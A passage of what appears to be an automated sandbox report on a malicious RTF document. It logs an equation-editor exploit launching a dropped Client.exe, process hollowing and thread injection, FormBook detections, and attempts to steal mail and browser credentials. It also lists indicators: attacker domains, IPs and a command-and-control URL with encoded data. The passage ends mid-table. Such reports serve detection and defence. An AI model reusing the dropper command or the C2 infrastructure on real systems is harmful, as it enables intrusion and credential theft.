          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1404Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 2252Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 2652Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B60101 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_01188E9C sldt word ptr [eax]
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000000A.00000000.1006484314.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000A.00000000.1011618925.0000000008844000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 0000000A.00000000.1011618925.0000000008844000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000A.00000000.968063390.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 0000000A.00000000.1027105135.000000000037B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 0000000A.00000000.968616738.0000000004423000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.1006484314.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 0000000A.00000000.968063390.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
          Source: EQNEDT32.EXE, 00000002.00000003.898154429.00000000005C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vmcicda.dll
          Source: explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B60101 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B00080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B000EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B226F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPort
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\notepad.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00363550 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.magadirect.co.uk
          Source: C:\Windows\explorer.exeNetwork Connect: 45.33.18.44 80
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\Client.exeSection unmapped: C:\Windows\SysWOW64\notepad.exe base address: 400000
          Source: C:\Windows\SysWOW64\notepad.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: A00000
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection unmapped: C:\Program Files (x86)\Mozilla Firefox\firefox.exe base address: 190000
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write
          Writes to foreign memory regions
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 400000
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 401000
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 7EFDE008
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 80000
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\SysWOW64\notepad.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\notepad.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\notepad.exeThread register set: target process: 1860
          Source: C:\Windows\SysWOW64\notepad.exeThread register set: target process: 1860
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEThread register set: target process: 1860
          Creates a thread in another existing process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\Client.exeThread created: C:\Windows\SysWOW64\notepad.exe EIP: 75554977
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B}
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
          Source: explorer.exe, 0000000A.00000000.984754885.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.951754136.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027690828.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.984754885.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.951754136.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.984754885.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.951754136.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027690828.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Client.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformation
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium4
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts43
          Exploitation for Client Execution          		Boot or Logon Initialization Scripts812
          Process Injection          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory13
          System Information Discovery          		Remote Desktop Protocol1
          Man in the Browser          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)3
          Obfuscated Files or Information          		Security Account Manager121
          Security Software Discovery          		SMB/Windows Admin Shares1
          Data from Local System          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
          Software Packing          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Email Collection          		Scheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets41
          Virtualization/Sandbox Evasion          		SSH1
          Clipboard Data          		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Masquerading          		Cached Domain Credentials1
          Remote System Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items41
          Virtualization/Sandbox Evasion          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job812
          Process Injection          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 680332 Sample: SecuriteInfo.com.Exploit.Rt... Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 42 www.luanaterra.online 2->42 44 www.hogogala.com 2->44 50 Document contains OLE streams which likely are hidden ActiveX objects 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Antivirus detection for dropped file 2->54 56 10 other signatures 2->56 12 EQNEDT32.EXE 47 2->12         started        15 WINWORD.EXE 292 21 2->15         started        signatures3 process4 file5 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->76 18 cmd.exe 12->18         started        36 C:\Users\user\AppData\Local\Temp\Client.exe, PE32 15->36 dropped 38 C:\Users\user\...\Client.exe:Zone.Identifier, ASCII 15->38 dropped 40 ~WRF{35F4FC89-AF57...1-CE9C986E155F}.tmp, Composite 15->40 dropped 78 Document exploit detected (creates forbidden files) 15->78 signatures6 process7 process8 20 Client.exe 18->20         started        signatures9 58 Multi AV Scanner detection for dropped file 20->58 60 Machine Learning detection for dropped file 20->60 62 Writes to foreign memory regions 20->62 64 3 other signatures 20->64 23 notepad.exe 20->23         started        process10 signatures11 66 Modifies the context of a thread in another process (thread injection) 23->66 68 Maps a DLL or memory area into another process 23->68 70 Sample uses process hollowing technique 23->70 72 Queues an APC in another process (thread injection) 23->72 26 explorer.exe 23->26 injected process12 dnsIp13 46 www.magadirect.co.uk 45.33.18.44, 49171, 80 LINODE-APLinodeLLCUS United States 26->46 74 System process connects to network (likely due to code injection or exploit) 26->74 30 NAPSTAT.EXE 9 26->30         started        signatures14 process15 dnsIp16 48 www.sqlite.org 45.33.6.223, 49172, 80 LINODE-APLinodeLLCUS United States 30->48 80 Tries to steal Mail credentials (via file / registry access) 30->80 82 Tries to harvest and steal browser information (history, passwords, etc) 30->82 84 Modifies the context of a thread in another process (thread injection) 30->84 86 2 other signatures 30->86 34 firefox.exe 30->34         started        signatures17 process18

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf15%ReversingLabsDocument-RTF.Trojan.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp100%AviraEXP/CVE-2017-11882.Gen
          C:\Users\user\AppData\Local\Temp\Client.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\Client.exe22%ReversingLabsByteCode-MSIL.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.0.notepad.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.notepad.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          www.bookmarkfiles.info/aekc/0%Avira URL Cloudsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.magadirect.co.uk/aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM0%Avira URL Cloudsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.hogogala.com
          		162.213.253.236
          		truefalse
            		unknown
            www.sqlite.org
            		45.33.6.223
